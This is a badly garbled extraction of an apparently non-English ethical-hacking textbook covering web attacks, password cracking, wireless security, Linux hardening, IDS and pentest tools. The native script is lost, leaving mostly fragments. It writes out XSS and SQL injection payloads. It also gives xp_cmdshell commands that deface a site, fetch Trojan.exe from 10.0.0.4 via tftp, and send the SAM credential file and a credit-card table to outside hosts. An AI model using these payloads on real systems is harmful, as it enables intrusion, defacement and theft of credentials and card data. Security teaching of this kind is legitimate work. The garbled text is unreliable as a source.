> www.xsecurity.com/default.asp?name=<script>evilScript()</script .
.
XSECURITY ><script>evilScript()</script
. HTML .
.
. XSECURITY
.
152
) (validate
XSS .
153
) (timeout
IP
logout
:Buffer overflow
. .
) Java (J2EE .
StackGuard ) StackShield
( .
:Authentication hijacking .
SSL .
Cookie Cryptographic interception Parameter/form tampering :
Platform Obfuscation application Error message interception attack Log tampering snppong
Zero day Web services attacks Security management exploits DMZ protocol attacks exploits
Network access attacks attack .TCP fragmentation
154
Instant Source HTML
. toolbar IE
.
Wget
.
.
WSDigger SQL injection
cross-site scripting .
dotDefender :
Patch Traversal Header Tapmering Cross-site Scripting Proxy Takeover SQL Injection
.Probes
Burp .
man-in-the-middle .
WebSleuth spidering .
.
155
WebWatchBot IP Ping
Port FTP POP3 SMTP HTTPS HTTP DNS .
.
BlackWidow
.
Parosproxy WebScarab Watchfire AppScan Ratproxy Mapper :
AppScan AccessDriver Falcove NetBrute Emsa Web Monitor KeepNI
Acunetix Web
.Scanner
Google Hacking
Google hacking
. http://johnny.ihackstuff.com Acunetix Web Vulnerability Scanner
google hacking .
password medical records .
.
.
. .
156
.
HTTP . HTTP basic : .digest basic
digest
challenge-response hash .
157
.
PIN
.
158
:
.
:
.
.
:
.
.
159
shoulder surfing
microsoft1
msoftmsoft
tfosorcim
io
qwerty asdf
e z3ro10v3 L 3 i 1 o 0
) (.pwl
Kerberos
160
" : "james8
" :"samatha
" :"superstitious
" :"sUperStiTIous
" :"obiwan
" :"spicer
" :"qwertyuiop
.
dictionary brute-force .
.
backdoor .
sniff .
dictionary attack
.
. hash
. hash ) (
SAM .
161
brute force .
.
:
:
:Dictionary .
:Brute force .
:Hybrid .
Cain & Abel
dictionary brute force .
ARP .
) Lophtcrack (LC4
.
John the Ripper .
162
Gammaprog POP3 .
MessenPass Yahoo Messanger MSN Messanger
Google Talk .
Password Spectator .
.
Webcracker . " HTTP
"302 object moved .
.
163
SQL injection Buffer overflow
) (input box .
URL
.
SQL injection Buffer overflow :
) .(invalid
.
shell .
SQL Injection
SQL injection
shell . SQL server
. Cmd .
.
SQL server .
SQL server .
165
SQL injection
SQL injection
. SQL server :
.1
)
" .("I forget my password POST
GET . POST URL
. . GET
POST > <Form :
><Form action=search.asp method=post
><input type=hidden name=X value=Z
></Form
CHI JSP ASP PHP URL
:
http://www.xsecurity.com/index.asp?id=10
:
http://www.xsecurity.com/index.asp?id=blah' or 1=1
166
.3 SELECT INSERT
.
167
SQL Server
SQL
:
)'( :
Blah' or 1=1
Login: blah' or 1=1
Password:: blah' or 1=1
http://search/index.asp?id=blah or 1=1
SQL Injection :
'or 1=1 -"or 1=1 -or 1=1-' or 'a'='a
" or "a"="a
)') or ('a'='a
)") or ("a"="a
.
SQL server .
SQL .
SQL :
:
Blah;exec master..xp_cmdshell dir c:\*.* /s >c:\directory.txt--
168
:
Blah;exec master..xp_cmdshell echo hacker-was-here > c:\hacker.txt-: IP ping
Blah;exec master..xp_cmdshell ping 192.168.1.1-:( write )
Blah;exec master..xp_cmdshell echo you-are-defaced >
c:\inetpub\WWW.root\index.htm"-:( )
Blah;exec master..xp_cmdshell cmd.exe /c appname.exe"-:
Blah;exec master..xp_cmdshell tftp -i 10.0.0.4 GET Trojan.exe
C:\trojan.exe"-:
Blah;exec master..xp_cmdshell tftp i 10.0.0.4 put
C:\winnt\repair\SAM SAM" - . sp_makewebtask HTML
: creditcard
Blah';EXEC master..sp_makewebtask "\\10.10.1.4\share\creditcard.html",
"SELECT * FROM CREDITCARD"
: SQL injection
SQLPoke Database Scanner AppDetective SQL2.exe SQLSmack SQLbf SqlExec SQLDict
.SQLPing v2.2 NGSSQuirreL NGSSQLCrack
169
SQL injection
) (syntax SQL . SQL
. JDBC
ADO .
SQL Injection
SQL injection
sa administrator .
)
SQL server ( . admin .
.
:
)(single quota
170
SQL injection :
171
Buffer Overflow
Buffer overflow .
SQL injection .
shell .
buffer overflow .
overflow .
. 32
. NT .
):(Stack
LIFO ) .(last in first out
. ) (release.
172
:Heap
Heap
. malloc .
buffer overflow
.
:
.1 ) (stack .
.2
.
overwrite .
.3
. overwrite
.
174
buffer overflow
.
: ) (overwritten EIP .
heap overwrite.
175
buffer overflow
: .
.
) (string . .
. segmentation . overwrite
.
.
buffer overflow
buffer overflow
. .
(No Operation) NOP padding
NOP . .
IDS NOP
. IDS NOP
.x++ , x--;?NOPNOP buffer overflow
IDS .
C C++ )( strcat() strcpy )( streadd
buffer overflow .
buffer overflow .
176
buffer overflow
RAD patch
.
buffer overflow .
177
. broadcast
.
) (WLAN IEEE 802.11
802.11b 802.11a 802.11n . 802.11
. 802.11i 802.11 . Wi-Fi
WPA WPA2
802.11 802.11i .
IEEE Wi-Fi .
:802.11 DSSS FHSS Infrared .
:802.11a
:802.11b WiFi
:802.11g 802.11b
:802.11i
:802.16
:Blutooth
:900MHz
179
:
. omni : .directional
:Access Point .
.
:SSID
SSID . .
access point . SSID
.
WEP WPA
access point :
) (open system ) .(shared key
. WEP
.
WEP WEP .
.
WEP 64 128 . WEP
40 104 24 (Initialization Vector) IV
WEP 64 128 .
RC4 IV WEP : WEP
. FMS .
WEPCrack AirSnort aircrack WEP
. brute force WEP
FMS.
180
181
IEEE 802.11
WEP
WEP
IV WEP
WPA
TKIP
RADIUS
WPA2
AES
IEEE 802.11i
AES
)(802.1x/EAP
RADIUS
)(802.1x/EAP
RADIUS
)(802.1x/EAP
:WarWalking
:Wardriving
:WarFlying
:WarChalking chalk
:Blue Jacking
:GPS
182
Aircrack WEP .
Aircrack .
.
WEPCrack AirSnort .
NetStumbler Kismet . SSID MAC address
. Kismet SSID
IDS .
WEPdecrypt WEP dictionary attack key generator.
CowPatty WPA-PSK brute force.
MAC Address XP
:
HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control
class } {4D36E972-E325-11CE-BFC1-08002bE10318
. XP
. Edit New String Values .
NetworkAddress . Modify MAC .
Address OK . MAC Address
.
SMAC MAC spoofing .
184
ClassicStumbler access point .
AirFart .
Hotspotter .
ASLEAP AP Radar : .Cain & Abel
:
: WEP
WPA LEAP .
.
: hotspot.
DoS :DoS Access Point
access point access point .
DoS LLC ) deauthentication (death
.
AP masquerading access point :spoofing SSID
access point .
:MAC spoofing MAC address
MAC filtering .
access point .
.
185
NetStumbler .
kismet NetStumbler
. Access
point SSID ... . monitor mode
Airdump capture Airdump . SSID
capture . Aircrack
. WEP
WireShark
POP FTP Telnet.
186
:
AP Scanner StumbVerter WaveStumbler Mognet MacStumbler PrismStumbler Kismet
Wifi Finder AirTraf Wireless Security Auditor .eEye Retina WIFI
:
EtherPEG vxSniffer Aerosol VPNmonitoral WireShark NAI Wireless Sniffer AiroPeek
.ssidsniff WinDump DriftNet
. OSI .
187
2 :
WPA
WPA2
802.11i
3 :
7 :
SSID :SSID .
: .
Access point .
DHCP IP .
access point .
access point .
Firmware .
.SSL
access point IP .
VPN .
188
IT
.
IDS .
" " .
tape keylogger
access point .
) (.
.
.
.
.
.
190
.
.
:
access point
) (
:
:
. CCTV
. . tape
.
) (lock .
. ...
: IDS spyware
.
191
:
.
) (
.
.
. :
192
.
.
.
:
o
o
o
.
193
: .
.
:
:
o ...
o
o
o
194
: .
:
o
o
o ) (boot floppy CD-ROM
o DOS DOS
.
: .
. :
o
o
o
o
195
:
:
o ) (auto answer
o
196
: .
:
o
o
o
o
: .
wiretap : .
.
) (shilded .
197
:
.
.
.
.
:
. (www.sentryinc.com) CyberAngel (www.ztrace.com) Ztrace Gold :
.(www.computrace.com) ComputracePlus .
: :
GPS . ...
.
198
:DeviceLock
.
199
. distribution .
.
Mandrake RedHat Debian SUSE Gentoo Knoppix.
.
.
.
. .
jove pico ex vi .GNU emacs
vi .
emacs .
GNU
. GNU BSD
. GNU BSD .
. )(job control
201
.
MS-DOS.
. . C
) (csh C . (sh) classic Bourne .
.
GNU Bash Bash ) job
(control .
tcsh C . small Bourne zsh
BSD's ash ksh likne shel .rc
256
:rm file
:ls dir
:pwd
:arp IP
:ifconfig
:netstat
:nslookup IP
:ping
:w session
:ps
:route
:shred overwrite
:traceroute
:adduser user1
:password user1 user1
203
:
:bin )(
:sbin ) (
:etc
:include include
:lib
:src
:doc
:man ) manual(
:share
.
.
.
.
CD .
.
.
backdoor . .
ftp.kernel.org
:
.1 /usr/src
. tar zxf .
.2 . /usr/src/Linux make
menuconfig .
. menu .
make dep; make clean .
204
.
. clean
.
.3 make zImage make modules
.
.4 . /boot
:
cp /usr/Linux/src/arch/i386/boot/zImage/boot/newkernel
.5 make modules_install . /lib/modules
.
.6 /etc/lilo.conf :
image = /boot/newkernel
label = new
read-only
.7 lilo .
lilo.conf .
Linux live CD . CD
.
CD live www.distrowatch.com
CD . CD .
205
GCC
GCC ) (command-line .
http://gcc.gnu.org . C++ C
.
C++ GCC :
g++ filename.cpp o outputfilename.out
C GCC :
gcc filename.c o outputfilename.out
) (LKM
. LKM rootkit LKM
. LKM .
LKM rootkit Adore Knark : .Rtkit
rootkit . LKM /tmp
/var/tmp
. LKM rootkit
. LKM modprobe LKM.
.
:
fileutils fetchmail (many) exim evolution ethereal (many) cvs cups Cron
206
kernel kerberos KDE iproute inetd hylafax gzip gnupg glibc ghostscript Gdm
openssh MYSQL mutt mplayer mpg123 mozilla man mailman lynx lsh Lprng
openssl
sendmail screen samba rsync python proftpd PostgreSQL postfix PHP pine Perl
xpdf xinetd XFree86 xchat wu-ftpd wget webmin vim tcpdump sudo stunnel snort
zlib
IP
. 65535 TCP
UDP ) 131070(
.
Nmap .
.
:Nessus
.
Nessus .
Xcrack
.
.
.
207
) (hardening .
.
.
.
.
null /etc/shadow .
deny all
. deny all .
deny all .
:
Cat "All:All>> /etc/hosts.deny
/proc filesystem /etc/sysctl.conf .
patch .
.
208
IP tables
)(HIDS
)(IPTable
IPTable ipchains .
statful . :
iptables A INPUT s 0/0 i eth0 d 192.168.1.1 p TCP j ACCEPT
eth0 IP
IP 192,168,1,1 .
iptables A OUTPUT p icmp icmp-type echo-request j ACCEPT
(ping) ICMP echo-request
ICMP .
(Security Auditors Research Assistant) SARA
. MAC OS.
Tcpdump .
ping .
Snort .
syslog .
209
Netcat
TCP UDP .
.
SAINT SATAN .
) (check ) ( .
:Wireshark
.
:
Hunt LIDS IPTraf LSOF Nemesis Sniffit Hping2 Abacus Port Sentry . ...
210
IDS honeypot
) (IDS honeypot
. ) (IDS
.
honeypot
.
.
signature
. IDSpacket sniffer
. event IDS pager
.
) (IPS ... .
IPS .
) (IDS :
:Host-based ) (HIDS
. agent Norton Internet Security Cisco Security .
: worm HIDS .
212
:Network-based ) (NIDS
.
.
malware . . IDS
.
IDS
Snort HIDS
. Snort IDS snort.conf .
snort :
Snort l c:\snort\log c C:\snort\etc\snoft.conf A console
BlackICE
. ) ( .
IDS .RealSecure Lucent RealSecure eTrust Internet Defense Dragon Sensor :
213
IDS signature
. UDP TCP HTTP ICMP
. IDS
. session plicing .
.
IDS :
IP
) (
214
) IP IP (
IDS
) (patern matching
.
IDS .
ADMutate .
signature IDS .
Fragrouter Stick Mendax SideStep : .Anzen NIDSbench
.
) (perimeter ) ( .
.
215
rule
.
performance . packet filtering .
telnet
217
80
HTTP
.
covert ICMP
. covert TCP
) (acknowledgment.
007 Shell shell-tunneling covert
.
ICMP Shell Telnet ICMP
) ( .
AckCmd / TCP ACK
.
Covert_TCP
IP .
Traffic IQ Professional
.
:
Application layer firewalls
Intrusion Detection Systems
Intrusion Prevention Systems
Routers and Switches
218
TCPOpera IDS .
Firewall Informer
. BLADE
) SAFE (
.
Atelier Web Firewall Tester
. 6 HTTP
.
Honeypot
honeypot DMZ
Honeypot .
IP .
. honeypot
DMZ . honeypot
.
219
honeypot
Honeypot )(Medium-interaction
:honeypot
False positive
false negative
IPv6
honypot ) (high-interaction
honeypot
Honeypot DMZ .
. honeypot
220
honeypot anti-honeypot
honeypot .
honeypot .
anti-honeypot honeypot honeyd ...
.
KFSensor
NetBait
ManTrap
Spector
Bubblegum
Jackpot
BackOfficer Friendly
Bait-n-Switch
Bigeye
HoneyWeb
Deception Toolkit
LaBrea Tarpit
Honeyed
221
Honeynets
Sendmail SPAM Trap
Tiny Honeypot
Specter honeypot
.
Honeyd honeypot
.
KFSensor HIDS honeypot
.
Sebek honeypot .
Honeypot
Honeypot IP high-
interaction .
Honeypot . honeypot
. honeypot
IP honeypot .
Send-Safe Honeypot Hunter honeypot honeypot .
Nessus Vulnerability Scanner honeypot .
222
.
) (clear text ) (cipher text .
.
. .
.
.
. .
) substitution
( ) transposition ( .
substitution transposition . .
224
.
.
.
.
:
.
.
.
.
.
225
SSH
SSH .
telnet SSH2 . SSH SFTP.
226
40 . 56
. 64
. 128 .
256 .
PGP ... .
.
PGP Crack brute force PGP.
Magic Lantern .
keylogger
.
228
.
:
.
) (Pen tester
.
Pen tester .
.
.
IP
.
.
.
. .
.
230
: .
.
.
.
.
outsource .
.
. 10 DMZ .
SLA .
.
.
.
.
)(pre-attack
)(attack
)(post-attack
231
. .
DNS Whois
) ( .
IP Whois
.
...
. :
. ) (exploitive )(responsive
. .
:
) :(perimeter ) (ACL
FTP SSH Telnet . buffer
232
:Output Sanitization .
:Access Control
...
:Compnent Checking
.
:Confidentiality Check
.
:Session Management
SSL SSL history cashe .
: .
CORE IMPACT
. brute-force
.
:
.
administrator .
233
: .
. ) (leaving a mark
.
.
.
.
.
.
.
:
) (NDA
2006
:
:Nessus 11000 .
/ GTK
.
234
:GFI LANguard .
IP .
patch
... .
:Retina . Nessus
.
:CORE IMPACT
) ( .
.
:ISS Internet Scanner .
1300
... .
:X-Scan .
username .
:SARA SATAN .
.
:QualysGuard .
. 5000 .
:SAINT .
235
:MBSA MBSA.
3 .
:
:Metasploit Framework .
:Canvas 150 .
. :
236